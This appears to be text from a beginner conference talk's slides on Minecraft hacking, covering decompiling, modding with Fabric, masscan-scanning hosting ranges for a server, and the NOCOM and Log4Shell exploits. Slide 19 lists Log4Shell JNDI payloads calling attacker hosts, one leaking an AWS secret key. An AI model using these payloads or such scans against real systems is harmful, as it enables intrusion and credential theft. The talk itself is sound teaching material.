This document discusses hacking in Minecraft. It provides an overview of Minecraft's history and the author's history playing the game. It then covers topics like decompiling Minecraft, running your own server, scanning for servers like LiveOverflow, connecting to LiveOverflow, using mods like Fabric and mixins, coordinate exploits from 2018, and the 2021 Log4Shell vulnerability. The document concludes by discussing X-ray mods and expressing concern that Minecraft taught players it is okay to run random JAR files from servers.

1. Hacking Minecraft -
for beginners
Hackersuli 2023

2. MC vs MC

3. Minecraft history
• First release 2011 November, Mojang Studios
• Best selling video game of all time!
• Originally written in Java
• Bought by Microsoft for US$2.5 billion in 2014
• 2020 - migrate all Mojang accounts to XBOX .... :(

4. My Minecraft history
• I started my
fi
rst Minecraft game 2022 Q4
• So far played ~15 hours as regular players
• Probably spent more time on trying to
fi
gure out the hacks

5. LiveOver
fl
ow for President!
• https://www.youtube.com/watch?v=Ekcseve-mOg&t=13s
• Total length of playlist : 6 hours, 35 minutes, 54 seconds

6. Decompile
• Minecraft is protected by ProGuard (shrinker, optimizer, obfuscator)
• https://github.com/FabricMC/intermediary + yarn
• https://www.youtube.com/watch?v=_L-cSopvlVg
• ~/Desktop/minecraft/server-1.19.2.jar.src/aiy.java
• IntelliJ - after yarn runs

7. Run your own server
• java -Xms2G -Xmx2G -jar paper-1.19.2-307.jar
• fabric-example-mod - gradle - tasks - fabric - runServer

8. Network proxy
• pip3 install twisted quarry
• https://github.com/LiveOver
fl
ow/
minecraft-hacked
• wiki.vg
• Question to audience: why /port
not working ???

9. Scan for LiveOver
fl
ow server
• rent a server (or free Oracle) - masscan all Hetzner IP https://ipinfo.io/AS24940
• sudo masscan -p 25565 -oJ masscan_b.json --rate 1000 --banners xxx.xxx.0.0/16
• Don't do the mistake and run only for 176.9.0.0/16 ....
• Or ... use this list: https://discord.com/channels/
1037311964629717023/1053261545192308756/1054438326502969364
• After that, use a script which can grab Minecraft server status details
• https://jorianwoltjer.com/blog/post/hacking/playing-on-the-liveover
fl
ow-
minecraft-hacking-server

10. Scan for LiveOver
fl
ow server
• Filter for "Paper 1.19.2"
• Filter for Max Players 50
• There is the real server and a Rust based proxy to
fi
lter out grievers,
operated by Philip_DE
• You have to connect to the proxy, and it will "proxy" connect you to
the real one

11. Connect to LiveOver
fl
ow
• You can double check if you found
the real one by connecting to
Discord server "LiveOver
fl
ow
Community" and use /check IP
• Use Minecraft client version 1.19.2
• Use legal client where you paid for
it, not something like Tlauncher
• Not the proxy you are looking for 👇

12. Human detected!

13. Fabric, loader, API, ...
Fabric is a lightweight, experimental modding toolchain for Minecraft
You need the Fabric installer to create the environment
And manually add the fabric-api into the mods directory

14. Fabric, loader, API, ...
Mixins are a powerful and important tool used in the Fabric
ecosystem.
Their primary use case is modifying existing code in the base game,
whether it be through injecting custom logic, removing mechanics, or
modifying values.
https://github.com/SpongePowered/Mixin/wiki

15. The easy solution
https://github.com/JorianWoltjer/LiveOver
fl
owMod/releases/download/
1.19.2-1.0.3/liveover
fl
owmod-1.0.jar
https://github.com/JorianWoltjer/LiveOver
fl
owMod/blob/master/src/
main/java/com/jorianwoltjer/liveover
fl
owmod/helper/
RoundPosition.java
https://github.com/JorianWoltjer/LiveOver
fl
owMod/blob/master/src/
main/java/com/jorianwoltjer/liveover
fl
owmod/mixin/
PlayerPositionFullPacketMixin.java

16. The solution
public static double roundCoordinate(double n) {
n = Math.round(n * 100) / 100d; // Round to 1/100th
return Math.nextAfter(n, n + Math.signum(n)); // Fix
fl
oating point errors
}

17. Meteor
client ...

18. NOCOM - ultimate coordinate exploit, 2018
YouTube: FitMC: The Fall of Minecraft's 2b2t
Step 1: Find a "crash" exploit by forcing the server to load tons of chunks
Step 2: Convince developers to "
fi
x" the crash
Step 3: The new exploit worked like: they could get info of far away chunks whether it is already
loaded or not
just use ML, probability association to link users with coordinates, months of development
follow users - adaptive tracking system
mirror 2b2t, with seed , recreates the "changes"
false
fl
ags operations, gaslighting

19. Log4Shell, 2021
Java - Log4j logging component critical vuln
FitMC: The Scariest Week in Minecraft History
${java:runtime}
${jndi:ldap://attacker-srv.com/foo}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo}
${${lower:j}ndi
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}

20. X-ray mods

24. https://minecraft.fandom.com/wiki/Tutorials/Redstone_computers

25. My problem with Minecraft
We taught an entire generation that downloading and running JAR
fi
les from random servers is OK ...

26. Happy hacking
Questions, comments?